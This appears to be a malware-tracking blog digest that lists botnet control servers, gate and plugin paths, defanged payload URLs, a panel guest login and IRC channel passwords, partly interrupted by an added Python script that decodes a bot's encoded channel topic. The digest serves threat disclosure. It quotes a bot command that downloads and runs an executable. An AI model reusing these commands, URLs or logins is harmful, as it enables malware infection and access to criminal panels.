ALiSs has found a new net.
Server: 74.208.111.48
Port: 1866
Channel: #!h!
* Topic for #!h! is: .load /99/106/112/81/55/59/40/105/121/99/108/102/45/111/98/115/102/103/110/97/108/101/120/8/64/119/114/53/122/126/122/126/117/113/100/83/46/112/124/64/40/46/102/126/105/
* Topic for #!h! set by wweras at Fri Dec 14 20:55:55 2012
Hosting infos: http://whois.domaintools.com/74.208.111.48
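The topic above carries the argument of the .load command as a run of slash-separated decimal numbers. As an added example (not code from the original post or from the bot's author), the script below splits the topic into command and argument and decodes the numbers on the assumption that each is one byte value; the post does not document the encoding, and for this topic the result is mostly printable but not meaningful text, which suggests a further layer of obfuscation that the post does not describe. The helper names and the printable-ratio check are my own.

```python
from __future__ import annotations

import string

# Topic string as it appears in the post above.
TOPIC = (
    ".load /99/106/112/81/55/59/40/105/121/99/108/102/45/111/98/115/102/103/"
    "110/97/108/101/120/8/64/119/114/53/122/126/122/126/117/113/100/83/46/"
    "112/124/64/40/46/102/126/105/"
)


def parse_topic(topic: str) -> tuple[str, bytes]:
    """Split '<command> /n/n/n/' into the command and the decoded argument.

    Assumption (not stated in the post): every number is a single byte value
    in the range 0-255. If that does not hold, the assumption is wrong and we
    refuse to guess.
    """
    command, _, arg = topic.strip().partition(" ")
    values = [int(tok) for tok in arg.split("/") if tok]
    if any(v < 0 or v > 255 for v in values):
        raise ValueError("value outside byte range; byte-encoding assumption is wrong")
    return command, bytes(values)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (space included, other
    whitespace control characters excluded)."""
    printable = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    return sum(b in printable for b in data) / len(data) if data else 0.0


def analyse(topic: str = TOPIC) -> dict:
    """Decode a topic and summarise what the bytes look like."""
    command, payload = parse_topic(topic)
    return {
        "command": command,
        "length": len(payload),
        "printable_ratio": printable_ratio(payload),
        # latin-1 maps every byte to one character, so nothing is lost here.
        "preview": payload.decode("latin-1"),
    }


if __name__ == "__main__":
    result = analyse()
    print(f"command={result['command']} length={result['length']} "
          f"printable={result['printable_ratio']:.2f}")
    print(repr(result["preview"]))
```

Running it shows one non-printable byte (a backspace, 0x08) among 45 and no recognisable words or URL, so a plain byte decoding is not the whole story for this bot's topic format.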
freetraffcounter.com (Click fraud botnet hosted by worldstream.nl)
Resolved freetraffcounter.com to 109.236.87.219
This is from the same guy as all the installs stuff I just posted, but it was downloaded separately using the smoke loader, so I gave it a post of its own. The bot first gets the ad link information from the freetraffcounter.com site. The link information is stored in JavaScript...
adzu324nbasmdaoias.su (Smokeloader http botnet hosted by istanbuldc.com)
Resolved adzu324nbasmdaoias.su to 185.4.227.98
Server: adzu324nbasmdaoias.su
Gate file: /wp/index.php
Guest login: adzu324nbasmdaoias.su/wp/guest.php guest:guest
Hosting infos: http://whois.domaintools.com/185.4.227.98
beerpigfarm.ru (Installs crap hosted by Santex.net)
Resolved beerpigfarm.ru to 46.166.130.216
I found a file on h4r3's latest Andromeda that downloaded a bunch of crap from this site.
hxxp://beerpigfarm.ru/smo - Smoke loader, posted here
hxxp://beerpigfarm.ru/min - a bitcoin miner, uses 50btc
Mining info: http://169TpR47JVcLaQXdGYE6Lv4Ps9DbVqHhSi:x@pool.50btc.com:8332
Since he's using no-account mode, we can snoop on his mining by plugging in his address on the...
group-gz.me (Andromeda http botnet hosted by Panamaserver.com)
Resolved group-gz.me to 190.123.47.198
Server: group-gz.me
Gate file: /.daci/perete.php
Plugins:
Rootkit: group-gz.me/.daci/r.pack
Socks: group-gz.me/.daci/s.pack
Formgrabber: group-gz.me/.daci/f.pack
Gate file: group-gz.me/.daci/fg.php
This guy is installing the recently posted survey winlocker on his bots.
Hosting infos: http://whois.domaintools.com/190.123.47.198
honey.punked.us (Andromeda http botnet hosted by kimsufi.com)
Resolved honey.punked.us to 94.23.213.78
Server: honey.punked.us
Gate file: /sex/image.php
Plugins:
Rootkit: http://doncarlosmayorista.com/.sec/r.pack
Socks: http://doncarlosmayorista.com/.sec/s.pack
Formgrabber: http://doncarlosmayorista.com/.sec/f.pack
Gate file: honey.punked.us/sex/fg.php
This is the new Andromeda of the French hacker h4r3. Now he's using cracked Andromeda with free domains.
Hosting infos: http://whois.domaintools.com/94.23.213.78
64.56.64.29 (ngr botnet hosted in United States, Los Angeles, Perfect International In)
Server: 64.56.64.29:1887
Server: 174.37.172.71:1887
Server: 184.172.60.181:1887
Server: 5.153.6.203 TCP:1887
Server Password:
Username: hxfyijc
Nickname: n{DE|XPa}hxfyijc
Channel: #pool (Password: leonis)
Channel: #r3
Channel topic: :~pu hxxp://hotfile.com/dl/184384511/5b0f4b2/omaigato.exe 765cce9dee5448f58d9e798d91dbf809 ~s -o ~s
Find more infos about the owner and domains by searching for 1887 in this blog.
Downloaded samples:
hxxp://199.7.177.244/dl/184384734/6e6cd1d/all.exe ==> downloads these links:
hxxp://80.86.83.93/index (2musicaonline.com)
hxxp://80.86.83.93/Emo-Screamo/ (2musicaonline.com)
hxxp://hotfile.com/dl/184299133/b91a140/8346g527rg239gth34t24t.html
Thanks to aLiSs the Turkish kebap for submitting samples.
Hosting infos: http://whois.domaintools.com/64.56.64.29
img197-imageshack.info (Andromeda http botnet and Spyeye banking malware hosted by ecatel.net)
Resolved img197-imageshack.info to 93.174.90.96
Andromeda
Server: img197-imageshack.info
Gate file: /panel/image.php
Spyeye
Server: img197-imageshack.info
Gate file: /gate.php
Login: /admin.php
Bonus silence winlocker crap: img197-imageshack.info/bl/eu.php
Hosting infos: http://whois.domaintools.com/93.174.90.96
unlockyourdesktop.info (Winlocker hosted by nerdie.net)
Resolved unlockyourdesktop.info to 199.96.156.208
Yet another survey-based winlocker. This one follows the established pattern of Ukash and MoneyPak winlockers by loading a webpage that contains the surveys rather than simply loading the offers like the previous variants.
[Image: Winlocker site showing offers]
This version does not appear to do anything to prevent the use of...
zxz.consulting-info.eu (Multiple http botnets hosted by France Roubaix Ovh Sas)
Resolved zxz.consulting-info.eu to 5.39.71.80
This is the French hacker known as h4r3, who has been posted before.
Andromeda
This is the same Andromeda net that was posted before, just with the rest of the domains.
Previous/disabled domains: vvv.exp1oit.in, xxx.be-shopping.net
Current domain: zxz.consulting-info.eu
Gate file: /service/image.php
Plugins:
Rootkit: tbontepaard.nl/gllr/r.pack
Socks: tbontepaard.nl/gllr/s.pack
kbot
Server: zxz.consulting-info.eu
Gate...